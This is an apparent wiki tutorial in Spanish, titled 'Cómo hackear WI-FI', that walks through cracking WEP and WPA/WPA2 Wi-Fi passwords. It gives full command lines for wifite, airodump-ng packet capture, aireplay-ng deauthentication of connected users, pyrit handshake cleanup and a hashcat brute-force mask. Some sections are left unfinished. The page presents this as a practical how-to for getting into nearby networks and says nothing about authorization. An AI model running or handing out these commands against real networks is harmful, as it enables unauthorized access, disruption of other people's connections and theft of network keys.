Cómo hackear WI-FI

De HackLab
Saltar a: navegación, buscar
Este artículo asume que tenés un pendrive vivo con Wifislax (o tenés instalados los programas necesarios) y sabés cómo arrancar desde un pendrive e instalar GNU/Linux.
Nota: Si sabes tanto deberías estarle enseñando a tus amigas!

WEP

Si ves una red WEP con suficiente señal y usuarios conectados (clientes) muy probablemente consigas la clave.

Wifite

Abrimos una terminal y ejecutamos wifite como root.

sudo wifite
  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r86)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlp3s0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

Cuando aparezcan suficintes redes y clientes le damos CTRL+C

Nota:
  • wlp3s0, wlan0, usb0, etc son nuestras interfaces de red inalambricas. Una placa de wi-fi, un dongle usb, nuestro puerto ethernet son interfaces de red por las que puede hablar nuestro sistema operativo con la red.
  • mon0, es una interfaz de red en modo monitor estas nos permiten escuchar y transmitir o inyectar paquetes que le llegaran a los demas clientes y APs (Access Points o Puntos de Acceso)
  NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
  --- --------------------  --  ----  -----  ----  ------
   1  Fibertel               1  WEP   53db    no 
   2  Arnet                  1  WPA   47db    no 
   3  Goku                   1  WPA2  32db    no 
[+] select target numbers (1-5) separated by commas, or 'all': 

Elegimos una red que use WEP y tenga clientes

Nota:
  • ESSID es el nombre de la red wi-fi.
  • CH o channel es el canal, un numero del 1 al 11 que indica la frecuencia. Wi-fi funciona a una frecuencia de 2.4Ghz o 2400Mhz.

Canales-Wi-Fi.jpg

  • ENCR es el método de encriptado, abierto, WEP, WPA o WPA2.
  • WPS? si el AP soporta WPS o no.
  • CLIENT si detectamos algun cliente del AP.

Espera a que genere suficientes IVs.

Aveces wifite pierde la paciencia y corta antes, talvez quieras probar el método de aircrack que es un poco mas manual.

Aircrack

Levantamos una interfaz en modo monitor

sudo airmon-ng start wlan0
Nota: Reemplazamos wlan0 por el nombre de nuestra interfaz de red inalámbrica. sudo airmon-ng nos muestra el listado de interfaces.

Escaneamos para ver las redes

sudo airodump-ng mon0

Cuando hayamos detectado las redes deseadas cortamos con CTRL+C.

Nota: Podemos filtrar por diferentes campos para obtener solo los resultados que nos interesen.
  • --channel x el canal en el que queremos escuchar.
  • --encrypt wep el tipo de encriptación que queremos detectar.
  • --bssid 01:23:45:67:89:ab la mac address del AP que queremos escuchar.
  • mon0 lo reemplazamos por el nombre de nuestra interfaz en modo monitor (generalmente mon0).

Empezamos a capturar el tráfico

sudo airodump-ng -w salida --ivs --channel 1 --bssid 01:23:45:67:89:ab mon0 

Y lo dejamos capturando todos los IVs que necesitemos (columna #Data).

Nota:
  • -w salida le dice que guarde el trafico capturado en el archivo salida.
  • --ivs le dice que solo guarde los IVs (lo que realmente necesitamos para romper WEP.)

Inyectamos paquetes

Si no hay muchos clientes o tráfico o queremos acelerar el proceso podemos inyectar paquetes con aireplay.

** TODO **
mira las opciones de aireplay-ng con -h

Crackeamos la clave

Para esto necesitaras muchos IVs, alrededor de 5000 o 10000 suelen ser suficientes. No es necesario detener el airodump para hacer esto, si no alcanzan los IVs en el momento aircrack esperará y volverá a intentar cuando haya más.

aircrack-ng salida.cap

WPA / WPA2

Capturar Saludo (Handshake)

Handshaker

Wifite

Sigue los pasos para WEP pero seleccionando una red diferente. Muchas veces no funciona.

Aircrack

Primero levantamos una interfaz en modo monitor (ver más arriba).

Luego empezá a capturar los paquetes en un archivo. Este comando guardará los paquetes enviados desde y hacia el router con mac address 00:11:aa:bb:cc:dd y canal 11 en el archivo salida.cap.

sudo airodump-ng --channel 11 --bssid 00:11:aa:bb:cc:dd -w salida mon0
Nota: Si no sabes el canal o el bssid (mac address) de la red, podes correr el siguiente comando y fijarte cuales aparecen.
sudo airodump-ng mon0

Y finalmente desconecta a la gilada (tiene que haber usuarios conectados al wifi y tenes que tener buena señal de ellos). Para esto usamos aireplay con la opcion --deauth o -0 y cuantos intentos de desconexion queremos hacer. Para esto es conveniente tener buena señal tanto con el router como con el cliente.

aireplay-ng -0 8 -c aa:aa:aa:aa:aa:aa -a 00:11:aa:bb:cc:dd mon0
Nota:
  • -c aa:aa:aa:aa:aa:aa La mac address de los clientes o stations, si no la ponemos intentará desconectar todos los clientes de ese router.
  • -a 00:11:aa:bb:cc:dd La mac address del AP o router. Esta opción es requerida.
  • -0 8 o --deauth 8 Seguido de un numero es cuantos intentos de desconectar a los clientes queremos hacer. 0 intentara sin parar.

Validar Saludo

Pyrit es un programa muy completo para crackear claves WPA y tiene una funcionalidad muy practica que nos dice la calidad del saludo que hemos capturado. Aveces la mala señal hace que tengamos que capturar varios saludos hasta que uno esta completo.

pyrit -r salida.cap analyze

Limpiar Saludo

Junto con el saludo se captura mucho trafico, con pyrit podemos limpiar la salida capturada y guardar solo el saludo que queremos.

pyrit -r salida.cap -o salida-limpia.cap strip

Crackear Saludo

Pyrit es mas rápido para crackear claves basado en diccionarios pero no tiene otras funcionalidades que si tienen otros programas especificos de crackeo de claves como mascaras y ataques de fuerza bruta. Por esto aveces vamos a preferir usar hashcat.

Crackear con Hashcat

Primero vamos a tener que convertir la captura del formato cap al formato hccap que es el utilizado por hashcat. Lo hacemos con el siguiente comando que nos dejara un archivo salida.hccap

aircrack-ng salida.cap -J salida

A crackear que se acaba el mundo!

hashcat -m 2500 -a3 salida.hccap ?d?d?d?d?d?d?d?d
Nota:

Chequea la documentación para mas ayuda.

  • -m 2500 Que tipo de clave queremos crackear, en este caso WPA.
  • -a3 Que tipo de ataque. En este caso 3 fuerza bruta.
  • salida.hccap el archivo con el saludo.
  • ?d?d?d?d?d?d?d?d mascara para el ataque por fuerza bruta, 8 caracteres numéricos.

WPS